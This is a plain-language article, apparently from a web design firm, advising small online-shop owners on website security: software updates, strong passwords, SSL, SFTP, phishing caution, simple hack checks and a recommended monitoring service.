This is a kind of boring article about website security, but this is so important to know that I suggest you just buckle down and read through the whole thing! Then let me know if we can help.
Keeping Your Site Secure
It is your job to keep your site as secure as possible. Especially if you are collecting customer information and credit card data, you need to be as careful as you can to protect your site.
To prevent anyone from logging in to your shop admin, your database, or FTP, you’ll need to use strong passwords. To keep your site from being hacked, you’ll want to follow good security practices. Here are some things you can do to keep your site secure.
- Keep your site software up to date. This means the program that runs your shop or your blog (such as osCommerce or WordPress). If there is a new version, it should be installed right away, as it could contain security fixes. Check the website for your software occasionally to see what version is the latest, and compare that with your version number. If you’re using hosted software, such as Shopify or Big Cartel, they take care of this for you.
- Make sure you don’t get spyware or a virus on your own computer. If you get a virus on your computer, hackers could gain access to your passwords or other information about your site. You can get viruses from junk email, or from visiting a website that’s been hacked or has a virus. Here are two programs you can install to protect your computer: Ad-Aware – Spybot
Protecting Credit Card Data:
- Set your shopping cart program to delete credit card data as soon as it’s been used, rather than storing it on the site.
- If you need to view the credit card number to process payments manually, make sure it’s split into two pieces (one in your admin, one emailed to you).
- Set up an SSL/Security Certificate if you’re accepting credit cards directly from your site. This will encrypt the information as it’s posted, so hackers can’t intercept it when it’s sent to you. You can also set up SSL to protect customer info even if you aren’t taking their credit card (to protect their email address, mailing address, etc.).
General Good Practices:
- Don’t follow links sent in email unless you trust the sender. Never click through on emails that are supposedly from eBay, PayPal, your bank, or a greeting card, unless you’re sure it’s legitimate.
- Don’t open email attachments unless you’re sure you know who they’re from.
- Avoid insecure software, and use a safer alternative. For example, use Firefox or Chrome instead of Internet Explorer, and use Thunderbird or Gmail instead of Outlook.
- If you do find spyware on your computer after running Ad-Aware or Spybot, it’s a good idea to change your website passwords after deleting the offending program.
Make sure all of your passwords are strong passwords. You can use a generator (like this one) if you only access your site from one location and don’t need to remember the passwords (but can let your browser remember them). If you use a laptop and take it out with you regularly (or use a public computer), it may not be a good idea to let your browser remember passwords, in case your computer is stolen. Alternately, you can create secure and memorable passwords – here’s a useful article.
If you log in to your site from any computer other than your own, be sure not to let the browser save your password information. Close the browser when you’re done working.
Make sure your FTP password isn’t also used for your hosting password, etc. This should only be used for FTP.
If you log into your site using FTP, you may want to start using an SFTP (Secure FTP) program, to encrypt your password as you connect.
Never email your password to anyone! If you post it online, make sure you’re posting over a secure https:// connection and that the site requires a login for anyone to view the info.
How To Check Your Site For Hacks:
- View the source of your index page in your browser. You can do this by right-clicking your site and choosing “view source.” Sometimes hackers will insert dozens of spam type links in the code of your page. These would look pretty obvious if there are a lot of them.
- If you aren’t already signed up for Google Webmaster Tools, I would recommend it, as they check your site for malware and report it back to you.
What To Do In Case Of Security Problems:
Change any passwords you can right away, then contact your web developer to check the site out. Your web developer should be able to fix it and let you know when the attack happened, what info was affected, and how you can prevent similar problems in the future.
Get Protected and Stay Protected:
We strongly recommend that you sign up for Sucuri to protect your site. This has proven to been a quick and cost-effective solution for our clients. The cost is per year, and they will monitor your website regularly, allow you to scan it yourself, and (best part!) they will clean it up for you if your site is hacked.
Savvy creative businesses say they always learn something helpful and interesting when they read our newsletter! You can join them here.